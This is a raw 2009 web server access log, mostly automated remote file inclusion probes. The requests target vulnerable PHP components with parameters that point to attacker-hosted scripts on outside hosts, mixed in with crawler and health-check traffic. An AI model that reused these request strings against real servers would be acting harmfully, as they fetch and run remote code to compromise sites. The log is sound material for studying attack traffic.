213.206.91.16 - - [23/May/2009:00:00:02 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.248.128.84 - - [23/May/2009:00:00:08 -0400] "GET /logs/access_log.Q108110900//modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
69.248.128.84 - - [23/May/2009:00:00:08 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
69.248.128.84 - - [23/May/2009:00:00:08 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
201.158.150.180 - - [23/May/2009:00:00:10 -0400] "GET /logs//atom.php5?page=http://shakur.sanjosedelmar.com/idv6.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.158.150.180 - - [23/May/2009:00:00:10 -0400] "GET /logs/access_log.Q108091700//atom.php5?page=http://shakur.sanjosedelmar.com/idv6.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.158.150.180 - - [23/May/2009:00:00:10 -0400] "GET //atom.php5?page=http://shakur.sanjosedelmar.com/idv6.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.158.150.180 - - [23/May/2009:00:00:11 -0400] "GET /logs/error_log.Q108091700//atom.php5?page=http://shakur.sanjosedelmar.com/idv6.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:00:00:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.143.109.236 - - [23/May/2009:00:00:45 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.206.91.16 - - [23/May/2009:00:00:52 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.206.91.16 - - [23/May/2009:00:01:12 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:00:01:35 -0400] "GET /logs/access_log.Q109051200/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:00:02:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [23/May/2009:00:03:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.52.34.165 - - [23/May/2009:00:05:08 -0400] "GET /logs/access_log.Q108090300//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:00:05:08 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:00:05:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:00:05:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.248.128.84 - - [23/May/2009:00:08:14 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
210.143.109.236 - - [23/May/2009:00:08:55 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://www.proinex.cz/tmp/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.18.209 - - [23/May/2009:00:09:28 -0400] "GET /logs/error_log.Q108070800/index1.php?site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
218.38.18.209 - - [23/May/2009:00:09:28 -0400] "GET /index1.php?site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
218.38.18.209 - - [23/May/2009:00:09:29 -0400] "GET /logs/index1.php?site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
72.30.142.171 - - [23/May/2009:00:09:48 -0400] "GET /logs/error_log.Q107052800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/May/2009:00:10:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.240.12.4 - - [23/May/2009:00:11:43 -0400] "GET /logs/access_log.Q109032000//skin/zero_vote/ask_password.php?dir=http://10kresidual.com/redhawkarms//includes/id1.txt??%0D? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
210.240.12.4 - - [23/May/2009:00:12:16 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://10kresidual.com/redhawkarms//includes/id1.txt??%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.30.142.171 - - [23/May/2009:00:12:20 -0400] "GET /logs/error_log.Q108012800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.240.12.4 - - [23/May/2009:00:12:27 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://10kresidual.com/redhawkarms//includes/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.52.34.165 - - [23/May/2009:00:12:40 -0400] "GET /logs/access_log.Q108090300%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:12:44 -0400] "GET ///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:12:44 -0400] "GET /logs///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2496 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:12:44 -0400] "GET /logs/access_log.Q108112400///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:00:12:52 -0400] "GET /logs/access_log.Q109050900///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.248.128.84 - - [23/May/2009:00:13:22 -0400] "GET /logs/access_log.Q108053100//modules/agendax/addevent.inc.php?agendax_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
66.249.72.114 - - [23/May/2009:00:14:06 -0400] "GET /images/store_burs_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
69.47.181.187 - - [23/May/2009:00:15:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
69.47.181.187 - - [23/May/2009:00:15:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
69.47.181.187 - - [23/May/2009:00:15:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
69.47.181.187 - - [23/May/2009:00:15:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
209.59.12.99 - - [23/May/2009:00:15:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.198.47.201 - - [23/May/2009:00:16:25 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
91.198.47.201 - - [23/May/2009:00:16:25 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
91.198.47.201 - - [23/May/2009:00:16:25 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.826"
210.116.102.163 - - [23/May/2009:00:16:58 -0400] "GET /logs/error_log.Q109050700/appserv/main.php?appserv_root=http://chr.es.kr/02.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:00:16:59 -0400] "GET /appserv/main.php?appserv_root=http://chr.es.kr/02.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:00:16:59 -0400] "GET /logs/appserv/main.php?appserv_root=http://chr.es.kr/02.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
123.125.64.49 - - [23/May/2009:00:17:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.51 - - [23/May/2009:00:17:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.23.236.98 - - [23/May/2009:00:18:08 -0400] "GET /logs/error_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://deepers.co.cc/cmd.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
203.23.236.98 - - [23/May/2009:00:18:08 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://deepers.co.cc/cmd.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
212.227.119.12 - - [23/May/2009:00:18:23 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.198.47.201 - - [23/May/2009:00:18:50 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
201.232.54.48 - - [23/May/2009:00:18:55 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:18:55 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:18:55 -0400] "GET /logs/access_log.Q108052600//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:18:59 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:18:59 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:18:59 -0400] "GET /logs/access_log.Q108052600//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:19:17 -0400] "GET /logs/access_log.Q109013000//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:19:21 -0400] "GET /logs/access_log.Q109013000//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:19:41 -0400] "GET /logs/access_log.Q109030200//include/index.inc.php?site_path=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:19:41 -0400] "GET /logs//include/index.inc.php?site_path=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:19:42 -0400] "GET //include/index.inc.php?site_path=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.23.236.98 - - [23/May/2009:00:20:13 -0400] "GET /logs/access_log.Q108121400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://deepers.co.cc/cmd.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
201.232.54.48 - - [23/May/2009:00:20:15 -0400] "GET /logs/access_log.Q108052600%20%20//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:20:20 -0400] "GET /logs/access_log.Q109013000%20%20//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:20:42 -0400] "GET /logs/access_log.Q108052600%20%20//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:00:20:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [23/May/2009:00:20:48 -0400] "GET /logs/access_log.Q109013000%20%20//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:22:38 -0400] "GET /logs/access_log.Q109050700//include/index.inc.php?site_path=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.116.102.163 - - [23/May/2009:00:22:53 -0400] "GET /logs/error_log.Q108111300/appserv/main.php?appserv_root=http://chr.es.kr/02.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
91.198.47.201 - - [23/May/2009:00:23:53 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
66.249.72.114 - - [23/May/2009:00:24:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B18412700E54D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.2.227.113 - - [23/May/2009:00:25:25 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:25:25 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:25:25 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:00:25:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [23/May/2009:00:28:52 -0400] "GET /logs/access_log.Q108111500//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:00:29:02 -0400] "GET /logs/access_log.Q108111500//classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
192.138.79.35 - - [23/May/2009:00:29:07 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
212.227.119.12 - - [23/May/2009:00:29:58 -0400] "GET /logs/access_log.Q108110700//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
212.227.119.12 - - [23/May/2009:00:29:58 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
212.227.119.12 - - [23/May/2009:00:29:59 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.34.181.87 - - [23/May/2009:00:30:23 -0400] "GET //oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.maierarchitekten.de/manager/processors/r8? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
81.2.227.113 - - [23/May/2009:00:30:31 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:00:30:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.227.119.12 - - [23/May/2009:00:31:28 -0400] "GET /logs/error_log.Q109021600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:00:31:31 -0400] "GET /logs/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:31:31 -0400] "GET /logs/access_log.Q109030500%20%20/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:31:31 -0400] "GET /common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:31:35 -0400] "GET /logs/access_log.Q109030500%20%20/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:31:35 -0400] "GET /common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:31:35 -0400] "GET /logs/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
212.227.119.12 - - [23/May/2009:00:32:10 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:00:32:26 -0400] "GET /logs/access_log.Q109032000%20%20/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:32:29 -0400] "GET /logs/access_log.Q109032000%20%20/common/db.php?commonpath=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
203.151.233.72 - - [23/May/2009:00:35:03 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [23/May/2009:00:35:03 -0400] "GET /logs/access_log.Q109032000//admin/spaw/spaw_control.class.php?spaw_root=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.151.233.72 - - [23/May/2009:00:35:03 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.2.227.113 - - [23/May/2009:00:35:10 -0400] "GET /logs/access_log.Q108120300/index.php?pagina=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:35:10 -0400] "GET /index.php?pagina=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
81.2.227.113 - - [23/May/2009:00:35:11 -0400] "GET /logs/index.php?pagina=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
203.151.233.72 - - [23/May/2009:00:35:19 -0400] "GET /logs/access_log.Q109022800//admin/spaw/spaw_control.class.php?spaw_root=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:35:24 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:00:35:29 -0400] "GET /logs/access_log.Q108121900//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.222.40.40 - - [23/May/2009:00:35:30 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.222.40.40 - - [23/May/2009:00:35:44 -0400] "GET /logs/access_log.Q108121900//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:00:35:44 -0400] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:00:35:44 -0400] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/May/2009:00:35:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.222.40.40 - - [23/May/2009:00:35:52 -0400] "GET /logs/access_log.Q109031800//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.175.122.228 - - [23/May/2009:00:36:09 -0400] "GET ///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:36:09 -0400] "GET /logs///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2496 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:36:09 -0400] "GET /logs/access_log.Q108112400///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:00:36:09 -0400] "GET /logs/access_log.Q109050900///?_zb_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:00:36:25 -0400] "GET /logs/access_log.Q109031800//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://vash-ru.net/vipzona/tmp/good.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
203.151.233.72 - - [23/May/2009:00:37:04 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.151.233.72 - - [23/May/2009:00:37:04 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.151.233.72 - - [23/May/2009:00:37:11 -0400] "GET /logs/access_log.Q108052400%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.125.233.222 - - [23/May/2009:00:37:25 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:00:37:25 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
85.125.233.222 - - [23/May/2009:00:38:09 -0400] "GET /logs/error_log.Q108062900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:00:38:09 -0400] "GET /logs/error_log.Q108062900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:00:38:09 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:00:38:10 -0400] "GET //modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:00:38:11 -0400] "GET /logs/error_log.Q109042900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.125.233.222 - - [23/May/2009:00:38:11 -0400] "GET /logs/error_log.Q109042900//modules/banner/com_banners/images/index.php?mosConfig_live_site=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 268 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.150.52.114 - - [23/May/2009:00:38:30 -0400] "GET /logs//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:38:30 -0400] "GET //include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:38:31 -0400] "GET //include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
212.150.52.114 - - [23/May/2009:00:38:31 -0400] "GET /logs//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://www.jinyang-susan.co.kr/bbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:00:38:37 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
